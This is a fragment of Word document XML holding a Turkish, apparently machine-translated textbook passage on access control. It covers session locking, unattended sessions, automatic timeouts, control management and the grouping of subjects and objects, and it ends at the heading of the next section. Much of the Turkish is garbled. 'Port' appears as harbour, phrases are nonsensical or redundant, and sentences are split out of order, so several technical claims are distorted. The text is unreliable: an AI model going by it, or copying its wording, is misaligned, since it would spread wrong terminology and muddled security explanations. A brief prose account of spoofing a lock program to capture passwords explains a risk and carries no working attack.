        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>askıya alınmış durumdan yalnızca bir parola veya başka bir kimlik doğrulama mekanizması sağlayarak. Bu kullanıcılar için daha elverişli olduğundan, kuruluşlar çalışanları izinli kullanmak yerine kullanmaya teşvik edeceğini umuyor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oturumları katılımsız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNIX'in kilit işlevi bir askıya alma programına bir örnektir. Kullanıcılar yapabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oturumu askıya alırken bir şifre girin ve aynı şifreyi tekrar girerek tekrar başlatın. Şifre, kullanıcının oturum açması olmamalıdır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Şifre, bir davetsiz misafir, kullanıcının oturumu sırasında yeni bir oturum başlatabildiğinden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kilit fonksiyonunu taklit edecek bir programın bulunmaması ve çalıştırılması, ardından</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcının özgeçmiş şifresini oku ve davetsiz misafirlerin kendi şifrelerinde sakla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oturum sonlandırma arızasını simüle etmeden önce dosyalar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Katılımsız oturumları önlemenin başka bir yolu da kullanıcıları kendi zincirleriyle zincirlemektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oturumları. Örneğin, eğer bir liman kilitli bir kapısı olan bir ofiste ise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ne zaman serbest bırakılırsa ve sadece bir kişi her kapının anahtarı varsa,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bir sistem mekanizmasına sahip olmak gerekli değildir. Kimliklerin tespiti için eserler kullanılıyorsa ve eserler sahiplerine aittir (örneğin hassas devlet binalarındaki kimlik kartlarına benzer şekilde),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Yapının çıkarılması, bir oturumun otomatik olarak sonlandırılmasını tetikleyebilir. İçinde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>daha yaygın ortamlarda, en iyi çözüm, bazı farklılıklar olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>devamındaki:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Bağlantı noktasından, zil veya başka bir sinyal olmadan beş dakika geçerse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cihaz sesleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Sinyal olmadan başka bir yarım dakika geçerse,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zaman aşımı adı verilen oturum gerçekleşir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir kullanıcı işlem yapmazsa sistem otomatik olarak oturumu sonlandırabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yönetici tarafından belirtilen bir süre boyunca (örneğin, beş dakika). böyle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bununla birlikte, bir tehlike tehlikesi vardır. Örneğin, kullanıcılar kilitlendi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(yani, sistemin hissedebileceği herhangi bir şekilde davranması engellenmiştir) uzun süren işlemlerle oturumlarını gereksiz yere sonlandırırlar. Ek olarak,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanıcılar programın altındaki bir işlemi simüle ederek kontrolü atlayabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kontrol, oturum sonlandırılmasını önlemek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> için yeterince sık. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.7.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>KONTROL YÖNETİMİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erişim kontrollerinin yönetimi, erişim kontrol kurallarının oluşturulmasını ve sürdürülmesini içerir. Bu hayati bir endişe çünkü eğer bu tür</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yönetim zordur, kötü yapılması kesindir. Etkili yönetimin anahtarı:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Kuralları mümkün olduğunca ekonomik ve doğal olarak ifade etmek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Mümkün olduğunca çok alakasız ayrımdan habersiz kalmak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• İdari kapsamın yönetilebilir yargı alanlarına indirgenmesi (yani,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yerinden).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kurallar, gruplama mekanizmaları kullanılarak ekonomik olarak ifade edilebilir. Yönetici arayüzleri, yöneticilerin mecburi olmadıklarını temin eder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alakasız ayrımlarla uğraşın ve idari kapsamın azaltılmasına yardımcı olun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aşağıdaki bölümlerde gruplama ve yönetici arayüzleri tartışılmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gruplandırma Konuları ve Nesneleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Söylenmesi gereken şeyin azaltılması iki yönü içerir: nesnelerin gruplandırılması ve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gruplama konuları. Kaynak kategorileri gruplandırmanın bir yolunu gösterir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nesneler. Başka bir mekanizma adlandırmadır. Örneğin, bir kullanıcının tüm özel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nesneler, kullanıcının tanımlayıcıları içinde kendi adını taşıyabilir. Bu durumda,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bir kullanıcının tüm bunlara her türlü erişime sahip olabileceğini belirten tek bir kural</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanıcının kendi özel nesneleri, binlerce veya hatta milyonlarca ayrı erişim izni ifadesinin yerini alabilir. Yine başka bir yol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nesneler gruplarına göre gruplandırılmıştır; Bu durumda, yöneticiler tüm manyetik bant hacimlerini veya tüm CICS işlemlerini sınıflandırabilir. Hala diğer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nesneleri gruplandırma yöntemleri cihaz, dizin ve kütüphanedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Konu grupları kategorilerle eşleştiğinde, birçok izin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tüm gruplara veya seçilen erişim türlerine grup veren tek bir kuralda belirtilmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>belirli kategorilerin kaynaklarına. Çeşitli idari amaçlar için,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ancak, gruplar kategorileri temsil etmeyebilir; aksine, temsil etmeleri gerekir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>organizasyon departmanları veya olmayan diğer gruplar (örneğin, projeler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kategoriler. Her ne kadar konu gruplama ayrıcalık standardına göre çalışsa da, kimlik tabanlı erişim kontrolü dengeyi yeniden düzenler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Yönetici Arabirimleri</w:t>
      </w:r>
    </w:p>
